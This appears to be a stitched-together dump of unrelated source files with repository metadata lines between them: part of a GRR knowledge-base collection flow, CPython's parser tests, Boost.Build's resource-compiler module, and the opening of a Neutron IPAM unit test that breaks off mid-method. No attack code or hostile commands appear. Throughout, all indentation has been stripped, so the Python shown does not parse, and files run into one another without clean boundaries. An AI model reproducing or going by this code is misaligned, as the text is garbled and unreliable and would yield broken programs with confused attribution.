def _GetDependencies(self):
bootstrap_artifact_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, collector_action="Bootstrap")
kb_base_set = set(config_lib.CONFIG["Artifacts.knowledge_base"])
kb_add = set(config_lib.CONFIG["Artifacts.knowledge_base_additions"])
kb_skip = set(config_lib.CONFIG["Artifacts.knowledge_base_skip"])
kb_set = kb_base_set.union(kb_add) - kb_skip
# Ignore bootstrap dependencies since they have already been fulfilled.
no_deps_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os,
name_list=kb_set,
exclude_dependents=True) - bootstrap_artifact_names
name_deps, all_deps = artifact_lib.ArtifactRegistry.SearchDependencies(
self.state.knowledge_base.os, kb_set)
# We only retrieve artifacts that are explicitly listed in
# Artifacts.knowledge_base + additions - skip.
name_deps = name_deps.intersection(kb_set)
self.state.all_deps = all_deps
# Ignore bootstrap dependencies since they have already been fulfilled.
awaiting_deps_artifacts = list(name_deps - no_deps_names
- bootstrap_artifact_names)
return no_deps_names, all_deps, awaiting_deps_artifacts
@flow.StateHandler(next_state="ProcessBase")
def ProcessBootstrap(self, responses):
"""Process the bootstrap responses."""
if not responses.success:
raise flow.FlowError("Failed to run BootStrapKnowledgeBaseFlow. %s" %
responses.status)
# Store bootstrap responses
if responses.First():
for key, value in responses.First().ToDict().items():
self.state.fulfilled_deps.append(key)
self.state.knowledge_base.Set(key, value)
(no_deps_names, self.state.all_deps,
self.state.awaiting_deps_artifacts) = self._GetDependencies()
# Schedule anything with no deps next
# Send each artifact independently so we can track which artifact produced
# it when it comes back.
# TODO(user): tag SendReplys with the flow that generated them.
for artifact_name in no_deps_names:
self.state.in_flight_artifacts.append(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
knowledge_base=self.state.knowledge_base,
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name})
def _ScheduleCollection(self):
# Schedule any new artifacts for which we have now fulfilled dependencies.
for artifact_name in self.state.awaiting_deps_artifacts:
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
deps = artifact_obj.GetArtifactPathDependencies()
if set(deps).issubset(self.state.fulfilled_deps):
self.state.in_flight_artifacts.append(artifact_name)
self.state.awaiting_deps_artifacts.remove(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name},
knowledge_base=self.state.knowledge_base)
# If we're not done but not collecting anything, start accepting the partial
# dependencies as full, and see if we can complete.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
if self.state.partial_fulfilled_deps:
partial = self.state.partial_fulfilled_deps.pop()
self.Log("Accepting partially fulfilled dependency: %s", partial)
self.state.fulfilled_deps.append(partial)
self._ScheduleCollection()
@flow.StateHandler(next_state="ProcessBase")
def ProcessBase(self, responses):
"""Process any retrieved artifacts."""
artifact_name = responses.request_data["artifact_name"]
self.state.in_flight_artifacts.remove(artifact_name)
self.state.completed_artifacts.append(artifact_name)
if not responses.success:
self.Log("Failed to get artifact %s. Status: %s", artifact_name,
responses.status)
else:
deps = self.SetKBValue(responses.request_data["artifact_name"],
responses)
if deps:
# If we fulfilled a dependency, make sure we have collected all
# artifacts that provide the dependency before marking it as fulfilled.
for dep in deps:
required_artifacts = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, provides=[dep])
if required_artifacts.issubset(self.state.completed_artifacts):
self.state.fulfilled_deps.append(dep)
else:
self.state.partial_fulfilled_deps.add(dep)
else:
self.Log("Failed to get artifact %s. Artifact failed to return value.",
artifact_name)
if self.state.awaiting_deps_artifacts:
# Schedule any new artifacts for which we have now fulfilled dependencies.
self._ScheduleCollection()
# If we fail to fulfil deps for things we're supposed to collect, raise
# an error.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
missing_deps = list(self.state.all_deps.difference(
self.state.fulfilled_deps))
raise flow.FlowError("KnowledgeBase initialization failed as the "
"following artifacts had dependencies that could "
"not be fulfilled %s. Missing: %s" %
(self.state.awaiting_deps_artifacts, missing_deps))
def SetKBValue(self, artifact_name, responses):
"""Set values in the knowledge base based on responses."""
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
if not responses:
return None
provided = set() # Track which deps have been provided.
for response in responses:
if isinstance(response, rdfvalue.KnowledgeBaseUser):
# MergeOrAddUser will update or add a user based on the attributes
# returned by the artifact in the KnowledgeBaseUser.
attrs_provided, merge_conflicts = (
self.state.knowledge_base.MergeOrAddUser(response))
provided.update(attrs_provided)
for key, old_val, val in merge_conflicts:
self.Log("KnowledgeBaseUser merge conflict in %s. Old value: %s, "
"Newly written value: %s", key, old_val, val)
elif len(artifact_obj.provides) == 1:
# This artifact provides a single KB attribute.
value = None
provides = artifact_obj.provides[0]
if isinstance(response, rdfvalue.RDFString):
value = str(responses.First())
elif artifact_obj.collectors[0].action == "GetRegistryValue":
value = responses.First().registry_data.GetValue()
if value:
logging.debug("Set KB %s to %s", provides, value)
self.state.knowledge_base.Set(provides, value)
provided.add(provides)
else:
logging.debug("Empty KB return value for %s", provides)
else:
# We are setting a knowledgebase value for something with multiple
# provides. This isn't currently supported.
raise RuntimeError("Attempt to process broken knowledge base artifact")
return provided
def CopyUsersFromKnowledgeBase(self, client):
"""Copy users from knowledgebase to USER.
TODO(user): deprecate USER completely in favour of KNOWLEDGE_BASE.user
Args:
client: client object open for writing
"""
usernames = []
user_list = client.Schema.USER()
for kbuser in self.state.knowledge_base.users:
user_list.Append(rdfvalue.User().FromKnowledgeBaseUser(kbuser))
if kbuser.username:
usernames.append(kbuser.username)
# Store it now
client.AddAttribute(client.Schema.USER, user_list)
client.AddAttribute(client.Schema.USERNAMES(
" ".join(usernames)))
@flow.StateHandler()
def End(self, unused_responses):
"""Finish up and write the results."""
client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token)
client.Set(client.Schema.KNOWLEDGE_BASE, self.state.knowledge_base)
self.CopyUsersFromKnowledgeBase(client)
client.Flush()
self.Notify("ViewObject", client.urn, "Knowledge Base Updated.")
self.SendReply(self.state.knowledge_base)
def UploadArtifactYamlFile(file_content, base_urn=None, token=None,
overwrite=True):
"""Upload a yaml or json file as an artifact to the datastore."""
_ = overwrite
if not base_urn:
base_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(base_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
# Iterate through each artifact adding it to the collection.
for artifact_value in artifact_lib.ArtifactsFromYaml(file_content):
artifact_coll.Add(artifact_value)
logging.info("Uploaded artifact %s to %s", artifact_value.name, base_urn)
return base_urn
def LoadArtifactsFromDatastore(artifact_coll_urn=None, token=None,
overwrite_if_exists=True):
"""Load artifacts from the data store."""
loaded_artifacts = []
if not artifact_coll_urn:
artifact_coll_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(artifact_coll_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
for artifact_value in artifact_coll:
artifact_lib.ArtifactRegistry.RegisterArtifact(
artifact_value, source="datastore:%s" % artifact_coll_urn,
overwrite_if_exists=overwrite_if_exists)
loaded_artifacts.append(artifact_value)
logging.debug("Loaded artifact %s from %s", artifact_value.name,
artifact_coll_urn)
# Once all artifacts are loaded we can validate, as validation of dependencies
# requires the group are all loaded before doing the validation.
for artifact_value in loaded_artifacts:
artifact_value.Validate()
class GRRArtifactMappings(object):
"""SemanticProto to AFF4 storage mappings.
Class defining mappings between RDFValues collected by Artifacts, and the
location they are stored in the AFF4 hierarchy.
Each entry in the map contains:
1. Location stored relative to the client.
2. Name of the AFF4 type.
3. Name of the attribute to be changed.
4. Method for adding the RDFValue to the Attribute (Set, Append)
"""
rdf_map = {
"SoftwarePackage": ("info/software", "InstalledSoftwarePackages",
"INSTALLED_PACKAGES", "Append")
}
class ArtifactLoader(registry.InitHook):
"""Loads artifacts from the datastore and from the filesystem.
Datastore gets loaded second so it can override Artifacts in the files.
"""
pre = ["AFF4InitHook"]
def RunOnce(self):
for path in config_lib.CONFIG["Artifacts.artifact_dirs"]:
artifact_lib.LoadArtifactsFromDir(path)
|
apache-2.0
|
adaussy/eclipse-monkey-revival
|
plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_parser.py
|
38
|
20214
|
import parser
import unittest
import sys
from test import test_support
#
# First, we test that we can generate trees from valid source fragments,
# and that these valid trees are indeed allowed by the tree-loading side
# of the parser module.
#
class RoundtripLegalSyntaxTestCase(unittest.TestCase):
def roundtrip(self, f, s):
st1 = f(s)
t = st1.totuple()
try:
st2 = parser.sequence2st(t)
except parser.ParserError, why:
self.fail("could not roundtrip %r: %s" % (s, why))
self.assertEqual(t, st2.totuple(),
"could not re-generate syntax tree")
def check_expr(self, s):
self.roundtrip(parser.expr, s)
def test_flags_passed(self):
# The unicode literals flags has to be passed from the paser to AST
# generation.
suite = parser.suite("from __future__ import unicode_literals; x = ''")
code = suite.compile()
scope = {}
exec code in scope
self.assertIsInstance(scope["x"], unicode)
def check_suite(self, s):
self.roundtrip(parser.suite, s)
def test_yield_statement(self):
self.check_suite("def f(): yield 1")
self.check_suite("def f(): yield")
self.check_suite("def f(): x += yield")
self.check_suite("def f(): x = yield 1")
self.check_suite("def f(): x = y = yield 1")
self.check_suite("def f(): x = yield")
self.check_suite("def f(): x = y = yield")
self.check_suite("def f(): 1 + (yield)*2")
self.check_suite("def f(): (yield 1)*2")
self.check_suite("def f(): return; yield 1")
self.check_suite("def f(): yield 1; return")
self.check_suite("def f():\n"
" for x in range(30):\n"
" yield x\n")
self.check_suite("def f():\n"
" if (yield):\n"
" yield x\n")
def test_expressions(self):
self.check_expr("foo(1)")
self.check_expr("{1:1}")
self.check_expr("{1:1, 2:2, 3:3}")
self.check_expr("{1:1, 2:2, 3:3,}")
self.check_expr("{1}")
self.check_expr("{1, 2, 3}")
self.check_expr("{1, 2, 3,}")
self.check_expr("[]")
self.check_expr("[1]")
self.check_expr("[1, 2, 3]")
self.check_expr("[1, 2, 3,]")
self.check_expr("()")
self.check_expr("(1,)")
self.check_expr("(1, 2, 3)")
self.check_expr("(1, 2, 3,)")
self.check_expr("[x**3 for x in range(20)]")
self.check_expr("[x**3 for x in range(20) if x % 3]")
self.check_expr("[x**3 for x in range(20) if x % 2 if x % 3]")
self.check_expr("[x+y for x in range(30) for y in range(20) if x % 2 if y % 3]")
#self.check_expr("[x for x in lambda: True, lambda: False if x()]")
self.check_expr("list(x**3 for x in range(20))")
self.check_expr("list(x**3 for x in range(20) if x % 3)")
self.check_expr("list(x**3 for x in range(20) if x % 2 if x % 3)")
self.check_expr("list(x+y for x in range(30) for y in range(20) if x % 2 if y % 3)")
self.check_expr("{x**3 for x in range(30)}")
self.check_expr("{x**3 for x in range(30) if x % 3}")
self.check_expr("{x**3 for x in range(30) if x % 2 if x % 3}")
self.check_expr("{x+y for x in range(30) for y in range(20) if x % 2 if y % 3}")
self.check_expr("{x**3: y**2 for x, y in zip(range(30), range(30))}")
self.check_expr("{x**3: y**2 for x, y in zip(range(30), range(30)) if x % 3}")
self.check_expr("{x**3: y**2 for x, y in zip(range(30), range(30)) if x % 3 if y % 3}")
self.check_expr("{x:y for x in range(30) for y in range(20) if x % 2 if y % 3}")
self.check_expr("foo(*args)")
self.check_expr("foo(*args, **kw)")
self.check_expr("foo(**kw)")
self.check_expr("foo(key=value)")
self.check_expr("foo(key=value, *args)")
self.check_expr("foo(key=value, *args, **kw)")
self.check_expr("foo(key=value, **kw)")
self.check_expr("foo(a, b, c, *args)")
self.check_expr("foo(a, b, c, *args, **kw)")
self.check_expr("foo(a, b, c, **kw)")
self.check_expr("foo(a, *args, keyword=23)")
self.check_expr("foo + bar")
self.check_expr("foo - bar")
self.check_expr("foo * bar")
self.check_expr("foo / bar")
self.check_expr("foo // bar")
self.check_expr("lambda: 0")
self.check_expr("lambda x: 0")
self.check_expr("lambda *y: 0")
self.check_expr("lambda *y, **z: 0")
self.check_expr("lambda **z: 0")
self.check_expr("lambda x, y: 0")
self.check_expr("lambda foo=bar: 0")
self.check_expr("lambda foo=bar, spaz=nifty+spit: 0")
self.check_expr("lambda foo=bar, **z: 0")
self.check_expr("lambda foo=bar, blaz=blat+2, **z: 0")
self.check_expr("lambda foo=bar, blaz=blat+2, *y, **z: 0")
self.check_expr("lambda x, *y, **z: 0")
self.check_expr("lambda x: 5 if x else 2")
self.check_expr("(x for x in range(10))")
self.check_expr("foo(x for x in range(10))")
def test_print(self):
self.check_suite("print")
self.check_suite("print 1")
self.check_suite("print 1,")
self.check_suite("print >>fp")
self.check_suite("print >>fp, 1")
self.check_suite("print >>fp, 1,")
def test_simple_expression(self):
# expr_stmt
self.check_suite("a")
def test_simple_assignments(self):
self.check_suite("a = b")
self.check_suite("a = b = c = d = e")
def test_simple_augmented_assignments(self):
self.check_suite("a += b")
self.check_suite("a -= b")
self.check_suite("a *= b")
self.check_suite("a /= b")
self.check_suite("a //= b")
self.check_suite("a %= b")
self.check_suite("a &= b")
self.check_suite("a |= b")
self.check_suite("a ^= b")
self.check_suite("a <<= b")
self.check_suite("a >>= b")
self.check_suite("a **= b")
def test_function_defs(self):
self.check_suite("def f(): pass")
self.check_suite("def f(*args): pass")
self.check_suite("def f(*args, **kw): pass")
self.check_suite("def f(**kw): pass")
self.check_suite("def f(foo=bar): pass")
self.check_suite("def f(foo=bar, *args): pass")
self.check_suite("def f(foo=bar, *args, **kw): pass")
self.check_suite("def f(foo=bar, **kw): pass")
self.check_suite("def f(a, b): pass")
self.check_suite("def f(a, b, *args): pass")
self.check_suite("def f(a, b, *args, **kw): pass")
self.check_suite("def f(a, b, **kw): pass")
self.check_suite("def f(a, b, foo=bar): pass")
self.check_suite("def f(a, b, foo=bar, *args): pass")
self.check_suite("def f(a, b, foo=bar, *args, **kw): pass")
self.check_suite("def f(a, b, foo=bar, **kw): pass")
self.check_suite("@staticmethod\n"
"def f(): pass")
self.check_suite("@staticmethod\n"
"@funcattrs(x, y)\n"
"def f(): pass")
self.check_suite("@funcattrs()\n"
"def f(): pass")
def test_class_defs(self):
self.check_suite("class foo():pass")
self.check_suite("@class_decorator\n"
"class foo():pass")
self.check_suite("@class_decorator(arg)\n"
"class foo():pass")
self.check_suite("@decorator1\n"
"@decorator2\n"
"class foo():pass")
def test_import_from_statement(self):
self.check_suite("from sys.path import *")
self.check_suite("from sys.path import dirname")
self.check_suite("from sys.path import (dirname)")
self.check_suite("from sys.path import (dirname,)")
self.check_suite("from sys.path import dirname as my_dirname")
self.check_suite("from sys.path import (dirname as my_dirname)")
self.check_suite("from sys.path import (dirname as my_dirname,)")
self.check_suite("from sys.path import dirname, basename")
self.check_suite("from sys.path import (dirname, basename)")
self.check_suite("from sys.path import (dirname, basename,)")
self.check_suite(
"from sys.path import dirname as my_dirname, basename")
self.check_suite(
"from sys.path import (dirname as my_dirname, basename)")
self.check_suite(
"from sys.path import (dirname as my_dirname, basename,)")
self.check_suite(
"from sys.path import dirname, basename as my_basename")
self.check_suite(
"from sys.path import (dirname, basename as my_basename)")
self.check_suite(
"from sys.path import (dirname, basename as my_basename,)")
self.check_suite("from .bogus import x")
def test_basic_import_statement(self):
self.check_suite("import sys")
self.check_suite("import sys as system")
self.check_suite("import sys, math")
self.check_suite("import sys as system, math")
self.check_suite("import sys, math as my_math")
def test_relative_imports(self):
self.check_suite("from . import name")
self.check_suite("from .. import name")
self.check_suite("from .pkg import name")
self.check_suite("from ..pkg import name")
def test_pep263(self):
self.check_suite("# -*- coding: iso-8859-1 -*-\n"
"pass\n")
def test_assert(self):
self.check_suite("assert alo < ahi and blo < bhi\n")
def test_with(self):
self.check_suite("with open('x'): pass\n")
self.check_suite("with open('x') as f: pass\n")
self.check_suite("with open('x') as f, open('y') as g: pass\n")
def test_try_stmt(self):
self.check_suite("try: pass\nexcept: pass\n")
self.check_suite("try: pass\nfinally: pass\n")
self.check_suite("try: pass\nexcept A: pass\nfinally: pass\n")
self.check_suite("try: pass\nexcept A: pass\nexcept: pass\n"
"finally: pass\n")
self.check_suite("try: pass\nexcept: pass\nelse: pass\n")
self.check_suite("try: pass\nexcept: pass\nelse: pass\n"
"finally: pass\n")
def test_except_clause(self):
self.check_suite("try: pass\nexcept: pass\n")
self.check_suite("try: pass\nexcept A: pass\n")
self.check_suite("try: pass\nexcept A, e: pass\n")
self.check_suite("try: pass\nexcept A as e: pass\n")
def test_position(self):
# An absolutely minimal test of position information. Better
# tests would be a big project.
code = "def f(x):\n return x + 1"
st1 = parser.suite(code)
st2 = st1.totuple(line_info=1, col_info=1)
def walk(tree):
node_type = tree[0]
next = tree[1]
if isinstance(next, tuple):
for elt in tree[1:]:
for x in walk(elt):
yield x
else:
yield tree
terminals = list(walk(st2))
self.assertEqual([
(1, 'def', 1, 0),
(1, 'f', 1, 4),
(7, '(', 1, 5),
(1, 'x', 1, 6),
(8, ')', 1, 7),
(11, ':', 1, 8),
(4, '', 1, 9),
(5, '', 2, -1),
(1, 'return', 2, 4),
(1, 'x', 2, 11),
(14, '+', 2, 13),
(2, '1', 2, 15),
(4, '', 2, 16),
(6, '', 2, -1),
(4, '', 2, -1),
(0, '', 2, -1)],
terminals)
#
# Second, we take *invalid* trees and make sure we get ParserError
# rejections for them.
#
class IllegalSyntaxTestCase(unittest.TestCase):
def check_bad_tree(self, tree, label):
try:
parser.sequence2st(tree)
except parser.ParserError:
pass
else:
self.fail("did not detect invalid tree for %r" % label)
def test_junk(self):
# not even remotely valid:
self.check_bad_tree((1, 2, 3), "<junk>")
def test_illegal_yield_1(self):
# Illegal yield statement: def f(): return 1; yield 1
tree = \
(257,
(264,
(285,
(259,
(1, 'def'),
(1, 'f'),
(260, (7, '('), (8, ')')),
(11, ':'),
(291,
(4, ''),
(5, ''),
(264,
(265,
(266,
(272,
(275,
(1, 'return'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302, (303, (304, (305, (2, '1')))))))))))))))))),
(264,
(265,
(266,
(272,
(276,
(1, 'yield'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302,
(303, (304, (305, (2, '1')))))))))))))))))),
(4, ''))),
(6, ''))))),
(4, ''),
(0, ''))))
self.check_bad_tree(tree, "def f():\n return 1\n yield 1")
def test_illegal_yield_2(self):
# Illegal return in generator: def f(): return 1; yield 1
tree = \
(257,
(264,
(265,
(266,
(278,
(1, 'from'),
(281, (1, '__future__')),
(1, 'import'),
(279, (1, 'generators')))),
(4, ''))),
(264,
(285,
(259,
(1, 'def'),
(1, 'f'),
(260, (7, '('), (8, ')')),
(11, ':'),
(291,
(4, ''),
(5, ''),
(264,
(265,
(266,
(272,
(275,
(1, 'return'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302, (303, (304, (305, (2, '1')))))))))))))))))),
(264,
(265,
(266,
(272,
(276,
(1, 'yield'),
(313,
(292,
(293,
(294,
(295,
(297,
(298,
(299,
(300,
(301,
(302,
(303, (304, (305, (2, '1')))))))))))))))))),
(4, ''))),
(6, ''))))),
(4, ''),
(0, ''))))
self.check_bad_tree(tree, "def f():\n return 1\n yield 1")
def test_print_chevron_comma(self):
# Illegal input: print >>fp,
tree = \
(257,
(264,
(265,
(266,
(268,
(1, 'print'),
(35, '>>'),
(290,
(291,
(292,
(293,
(295,
(296,
(297,
(298, (299, (300, (301, (302, (303, (1, 'fp')))))))))))))),
(12, ','))),
(4, ''))),
(0, ''))
self.check_bad_tree(tree, "print >>fp,")
def test_a_comma_comma_c(self):
# Illegal input: a,,c
tree = \
(258,
(311,
(290,
(291,
(292,
(293,
(295,
(296,
(297,
(298, (299, (300, (301, (302, (303, (1, 'a')))))))))))))),
(12, ','),
(12, ','),
(290,
(291,
(292,
(293,
(295,
(296,
(297,
(298, (299, (300, (301, (302, (303, (1, 'c'))))))))))))))),
(4, ''),
(0, ''))
self.check_bad_tree(tree, "a,,c")
def test_illegal_operator(self):
# Illegal input: a $= b
tree = \
(257,
(264,
(265,
(266,
(267,
(312,
(291,
(292,
(293,
(294,
(296,
(297,
(298,
(299,
(300, (301, (302, (303, (304, (1, 'a'))))))))))))))),
(268, (37, '$=')),
(312,
(291,
(292,
(293,
(294,
(296,
(297,
(298,
(299,
(300, (301, (302, (303, (304, (1, 'b'))))))))))))))))),
(4, ''))),
(0, ''))
self.check_bad_tree(tree, "a $= b")
def test_malformed_global(self):
#doesn't have global keyword in ast
tree = (257,
(264,
(265,
(266,
(282, (1, 'foo'))), (4, ''))),
(4, ''),
(0, ''))
self.check_bad_tree(tree, "malformed global ast")
def test_missing_import_source(self):
# from import a
tree = \
(257,
(267,
(268,
(269,
(281,
(283, (1, 'from'), (1, 'import'),
(286, (284, (1, 'fred')))))),
(4, ''))),
(4, ''), (0, ''))
self.check_bad_tree(tree, "from import a")
class CompileTestCase(unittest.TestCase):
# These tests are very minimal. :-(
def test_compile_expr(self):
st = parser.expr('2 + 3')
code = parser.compilest(st)
self.assertEqual(eval(code), 5)
def test_compile_suite(self):
st = parser.suite('x = 2; y = x + 3')
code = parser.compilest(st)
globs = {}
exec code in globs
self.assertEqual(globs['y'], 5)
def test_compile_error(self):
st = parser.suite('1 = 3 + 4')
self.assertRaises(SyntaxError, parser.compilest, st)
def test_compile_badunicode(self):
st = parser.suite('a = u"\U12345678"')
self.assertRaises(SyntaxError, parser.compilest, st)
st = parser.suite('a = u"\u1"')
self.assertRaises(SyntaxError, parser.compilest, st)
class ParserStackLimitTestCase(unittest.TestCase):
"""try to push the parser to/over it's limits.
see http://bugs.python.org/issue1881 for a discussion
"""
def _nested_expression(self, level):
return "["*level+"]"*level
def test_deeply_nested_list(self):
e = self._nested_expression(99)
st = parser.expr(e)
st.compile()
def test_trigger_memory_error(self):
e = self._nested_expression(100)
print >>sys.stderr, "Expecting 's_push: parser stack overflow' in next line"
self.assertRaises(MemoryError, parser.expr, e)
def test_main():
test_support.run_unittest(
RoundtripLegalSyntaxTestCase,
IllegalSyntaxTestCase,
CompileTestCase,
ParserStackLimitTestCase,
)
if __name__ == "__main__":
test_main()
|
epl-1.0
|
phra/802_21
|
boost_1_49_0/tools/build/v2/tools/rc.py
|
32
|
7115
|
# Status: being ported by Steven Watanabe
# Base revision: 47077
#
# Copyright (C) Andre Hentz 2003. Permission to copy, use, modify, sell and
# distribute this software is granted provided this copyright notice appears in
# all copies. This software is provided "as is" without express or implied
# warranty, and with no claim as to its suitability for any purpose.
#
# Copyright (c) 2006 Rene Rivera.
#
# Copyright (c) 2008 Steven Watanabe
#
# Use, modification and distribution is subject to the Boost Software
# License Version 1.0. (See accompanying file LICENSE_1_0.txt or
# http://www.boost.org/LICENSE_1_0.txt)
##import type ;
##import generators ;
##import feature ;
##import errors ;
##import scanner ;
##import toolset : flags ;
from b2.build import type, toolset, generators, scanner, feature
from b2.tools import builtin
from b2.util import regex
from b2.build.toolset import flags
from b2.manager import get_manager
__debug = None
def debug():
global __debug
if __debug is None:
__debug = "--debug-configuration" in bjam.variable("ARGV")
return __debug
type.register('RC', ['rc'])
def init():
pass
def configure (command = None, condition = None, options = None):
"""
Configures a new resource compilation command specific to a condition,
usually a toolset selection condition. The possible options are:
* <rc-type>(rc|windres) - Indicates the type of options the command
accepts.
Even though the arguments are all optional, only when a command, condition,
and at minimum the rc-type option are given will the command be configured.
This is so that callers don't have to check auto-configuration values
before calling this. And still get the functionality of build failures when
the resource compiler can't be found.
"""
rc_type = feature.get_values('<rc-type>', options)
if rc_type:
assert(len(rc_type) == 1)
rc_type = rc_type[0]
if command and condition and rc_type:
flags('rc.compile.resource', '.RC', condition, command)
flags('rc.compile.resource', '.RC_TYPE', condition, rc_type.lower())
flags('rc.compile.resource', 'DEFINES', [], ['<define>'])
flags('rc.compile.resource', 'INCLUDES', [], ['<include>'])
if debug():
print 'notice: using rc compiler ::', condition, '::', command
engine = get_manager().engine()
class RCAction:
"""Class representing bjam action defined from Python.
The function must register the action to execute."""
def __init__(self, action_name, function):
self.action_name = action_name
self.function = function
def __call__(self, targets, sources, property_set):
if self.function:
self.function(targets, sources, property_set)
# FIXME: What is the proper way to dispatch actions?
def rc_register_action(action_name, function = None):
global engine
if engine.actions.has_key(action_name):
raise "Bjam action %s is already defined" % action_name
engine.actions[action_name] = RCAction(action_name, function)
def rc_compile_resource(targets, sources, properties):
rc_type = bjam.call('get-target-variable', targets, '.RC_TYPE')
global engine
engine.set_update_action('rc.compile.resource.' + rc_type, targets, sources, properties)
rc_register_action('rc.compile.resource', rc_compile_resource)
engine.register_action(
'rc.compile.resource.rc',
'"$(.RC)" -l 0x409 "-U$(UNDEFS)" "-D$(DEFINES)" -I"$(>:D)" -I"$(<:D)" -I"$(INCLUDES)" -fo "$(<)" "$(>)"')
engine.register_action(
'rc.compile.resource.windres',
'"$(.RC)" "-U$(UNDEFS)" "-D$(DEFINES)" -I"$(>:D)" -I"$(<:D)" -I"$(INCLUDES)" -o "$(<)" -i "$(>)"')
# FIXME: this was originally declared quietly
engine.register_action(
'compile.resource.null',
'as /dev/null -o "$(<)"')
# Since it's a common practice to write
# exe hello : hello.cpp hello.rc
# we change the name of object created from RC file, to
# avoid conflict with hello.cpp.
# The reason we generate OBJ and not RES, is that gcc does not
# seem to like RES files, but works OK with OBJ.
# See http://article.gmane.org/gmane.comp.lib.boost.build/5643/
#
# Using 'register-c-compiler' adds the build directory to INCLUDES
# FIXME: switch to generators
builtin.register_c_compiler('rc.compile.resource', ['RC'], ['OBJ(%_res)'], [])
__angle_include_re = "#include[ ]*<([^<]+)>"
# Register scanner for resources
class ResScanner(scanner.Scanner):
def __init__(self, includes):
scanner.__init__ ;
self.includes = includes
def pattern(self):
return "(([^ ]+[ ]+(BITMAP|CURSOR|FONT|ICON|MESSAGETABLE|RT_MANIFEST)" +\
"[ ]+([^ \"]+|\"[^\"]+\"))|(#include[ ]*(<[^<]+>|\"[^\"]+\")))" ;
def process(self, target, matches, binding):
angle = regex.transform(matches, "#include[ ]*<([^<]+)>")
quoted = regex.transform(matches, "#include[ ]*\"([^\"]+)\"")
res = regex.transform(matches,
"[^ ]+[ ]+(BITMAP|CURSOR|FONT|ICON|MESSAGETABLE|RT_MANIFEST)" +\
"[ ]+(([^ \"]+)|\"([^\"]+)\")", [3, 4])
# Icons and other includes may referenced as
#
# IDR_MAINFRAME ICON "res\\icon.ico"
#
# so we have to replace double backslashes to single ones.
res = [ re.sub(r'\\\\', '/', match) for match in res ]
# CONSIDER: the new scoping rule seem to defeat "on target" variables.
g = bjam.call('get-target-variable', target, 'HDRGRIST')
b = os.path.normalize_path(os.path.dirname(binding))
# Attach binding of including file to included targets.
# When target is directly created from virtual target
# this extra information is unnecessary. But in other
# cases, it allows to distinguish between two headers of the
# same name included from different places.
# We don't need this extra information for angle includes,
# since they should not depend on including file (we can't
# get literal "." in include path).
g2 = g + "#" + b
g = "<" + g + ">"
g2 = "<" + g2 + ">"
angle = [g + x for x in angle]
quoted = [g2 + x for x in quoted]
res = [g2 + x for x in res]
all = angle + quoted
bjam.call('mark-included', target, all)
engine = get_manager().engine()
engine.add_dependency(target, res)
bjam.call('NOCARE', all + res)
engine.set_target_variable(angle, 'SEARCH', ungrist(self.includes))
engine.set_target_variable(quoted, 'SEARCH', b + ungrist(self.includes))
engine.set_target_variable(res, 'SEARCH', b + ungrist(self.includes)) ;
# Just propagate current scanner to includes, in a hope
# that includes do not change scanners.
get_manager().scanners().propagate(self, angle + quoted)
scanner.register(ResScanner, 'include')
type.set_scanner('RC', ResScanner)
|
gpl-2.0
|
silenci/neutron
|
neutron/tests/unit/ipam/drivers/neutrondb_ipam/test_db_api.py
|
15
|
7533
|
# Copyright 2015 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from neutron import context
from neutron.ipam.drivers.neutrondb_ipam import db_api
from neutron.ipam.drivers.neutrondb_ipam import db_models
from neutron.tests.unit import testlib_api
class TestIpamSubnetManager(testlib_api.SqlTestCase):
"""Test case for SubnetManager DB helper class"""
def setUp(self):
super(TestIpamSubnetManager, self).setUp()
self.ctx = context.get_admin_context()
self.neutron_subnet_id = uuidutils.generate_uuid()
self.ipam_subnet_id = uuidutils.generate_uuid()
self.subnet_ip = '1.2.3.4'
self.single_pool = ('1.2.3.4', '1.2.3.10')
self.multi_pool = (('1.2.3.2', '1.2.3.12'), ('1.2.3.15', '1.2.3.24'))
self.subnet_manager = db_api.IpamSubnetManager(self.ipam_subnet_id,
self.neutron_subnet_id)
self.subnet_manager_id = self.subnet_manager.create(self.ctx.session)
self.ctx.session.flush()
def test_create(self):
self.assertEqual(self.ipam_subnet_id, self.subnet_manager_id)
subnets = self.ctx.session.query(db_models.IpamSubnet).filter_by(
id=self.ipam_subnet_id).all()
self.assertEqual(1, len(subnets))
def test_remove(self):
count = db_api.IpamSubnetManager.delete(self.ctx.session,
self.neutron_subnet_id)
self.assertEqual(1, count)
subnets = self.ctx.session.query(db_models.IpamSubnet).filter_by(
id=self.ipam_subnet_id).all()
self.assertEqual(0, len(subnets))
def test_remove_non_existent_subnet(self):
count = db_api.IpamSubnetManager.delete(self.ctx.session,
'non-existent')
self.assertEqual(0, count)
def _create_pools(self, pools):
